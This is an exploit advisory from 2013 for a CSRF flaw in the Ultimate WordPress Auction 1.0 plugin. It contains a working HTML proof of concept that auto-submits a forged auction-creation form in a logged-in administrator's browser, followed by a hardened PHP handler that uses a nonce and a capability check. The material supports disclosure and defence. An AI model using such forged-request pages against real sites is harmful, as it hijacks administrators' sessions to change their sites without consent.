
Ultimate WordPress Auction v1.0 Plugin CSRF Vulnerability

Author: f4ry4r_red, Published: 16-09-2013
###########################################################################################
# Exploit Title: [ Ultimate WordPress Auction v1.0 Plugin CSRF Vulnerability ]
# Date: [2013-6-20]
# Exploit Author : HackFans
# Vendor Homepage : http://forums.hackfans.org/
# Software Link: [http://downloads.wordpress.org/plugin/ultimate-auction.zip]
# Version: [1.0]
# Tested on: [Wordpress 3.5.1 (Windows)]
# Contacts: { https://www.facebook.com/Hackfans.org }
###########################################################################################
#D:: ___ ____ ____
#````______/```\__//```\__/____\
#``_/```\_/``:```````````//____\
#`/|``````:``:``..``````/ f4ry4r_red \
#|`|`````::`````::``````\````````/
#|`|`````:|`````||`````\`\______/
#|`|`````||`````||``````|\``/``|
#`\|`````||`````||``````|```/`|`\
#``|`````||`````||``````|``/`/_\`\
#``|`___`||`___`||``````|`/``/````\
#```\_-_/``\_-_/`|`____`|/__/``````\
#````````````````_\_--_/````\`````/
#```````````````/____```````````/
#``````````````/`````\`````````/
#``````````````\______\_______/

# f4ry4r_red W4s H3r3...!


1. Plugin Description:
========================

The Ultimate WordPress Auction plugin offers a quick and easy way to set up a professional, eBay-style auction website.

2. Vulnerability Description:
==============================

The WordPress plugin "Ultimate WordPress Auction 1.0" suffers from a CSRF vulnerability: the admin form that creates auctions carries no anti-CSRF nonce, so an attacker can trick a logged-in administrator's browser into submitting it and add fake auction bids.


Affected URL:
--------------

http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction


eXpl0it code:
--------------

<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
// the form's id is "wdm-add-auction-form" (it is also reachable as document.myForm)
document.getElementById('wdm-add-auction-form').submit();
}
</script>
</head>
<body>

<form name="myForm" id="wdm-add-auction-form" class="auction_settings_section_style" action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction" method="POST" novalidate="novalidate">

Title:
<input name="auction_title" type="text" id="auction_title" class="regular-text valid" value="expl0iter">
Description:
<textarea name="auction_description" id="auction_description" cols="50" rows="10" class="large-text code valid"></textarea>
<input name="opening_bid" type="text" id="opening_bid" class="small-text number" min="0" value="">
<input name="lowest_bid" type="text" id="lowest_bid" class="small-text number" min="0" value="">
<input name="incremental_value" type="text" id="incremental_value" class="small-text number" min="0" value="">
<input name="end_date" type="text" id="end_date" class="regular-text hasDatepicker" readonly="" value="2013-07-10 00:00:00">
<input name="buy_it_now_price" type="text" id="buy_it_now_price" class="small-text number" min="1" value="">
<input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes">

</form>

<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>

Once the victim opens this page, the form is auto-submitted and a new auction of the attacker's choice is added (provided the victim is logged in to WordPress as a user allowed to create auctions).
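As an added example (not the plugin's own code), the following is a hypothetical WordPress admin-post handler for the same form, hardened against this CSRF with a nonce and a capability check; the field names come from the PoC form above, while the hook name, function names, nonce action/field names and the required capability are assumptions.

```php
<?php
// Added example, not the plugin's code. Field names match the PoC form;
// hook, function, nonce and capability names are assumptions.
add_action('admin_post_wdm_add_auction', 'example_handle_add_auction');

function example_render_add_auction_form() {
    ?>
    <form method="post" action="<?php echo esc_url(admin_url('admin-post.php')); ?>">
        <input type="hidden" name="action" value="wdm_add_auction">
        <?php // Per-user, per-action, time-limited token a third-party page cannot know. ?>
        <?php wp_nonce_field('wdm_add_auction', 'wdm_add_auction_nonce'); ?>
        <input name="auction_title" type="text">
        <textarea name="auction_description"></textarea>
        <input name="opening_bid" type="number" min="0">
        <input name="end_date" type="text">
        <?php submit_button('Save Changes'); ?>
    </form>
    <?php
}

function example_handle_add_auction() {
    // 1. Capability check: the same request from a low-privilege account must fail too
    //    ('manage_options' is an assumed capability for this example).
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions', '', ['response' => 403]);
    }

    // 2. Nonce check: a form hosted on another site cannot carry a valid nonce,
    //    so the forged POST from the PoC above is rejected with a 403 here.
    check_admin_referer('wdm_add_auction', 'wdm_add_auction_nonce');

    // 3. Validate and sanitise the fields before anything is stored.
    $title       = sanitize_text_field(wp_unslash($_POST['auction_title'] ?? ''));
    $description = sanitize_textarea_field(wp_unslash($_POST['auction_description'] ?? ''));
    $opening_bid = (float) ($_POST['opening_bid'] ?? 0);
    $end_date    = sanitize_text_field(wp_unslash($_POST['end_date'] ?? ''));
    if ($title === '' || $opening_bid < 0 || strtotime($end_date) === false) {
        wp_die('Invalid auction data', '', ['response' => 400]);
    }

    // ... persist the validated auction here (storage omitted) ...

    wp_safe_redirect(add_query_arg('page', 'add-new-auction', admin_url('admin.php')));
    exit;
}
```

The nonce is what closes the CSRF hole: it is bound to the logged-in user's session and expires, so a pre-built form cannot supply a valid value even when the victim is authenticated.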

################################################################################################################
Greetz : BlackErroR, X3NON ,Saman.gunner,HaCkeD,m3h2lad,Crack3R, ALI_TNP Crall of member In hackfans
################################################################################################################
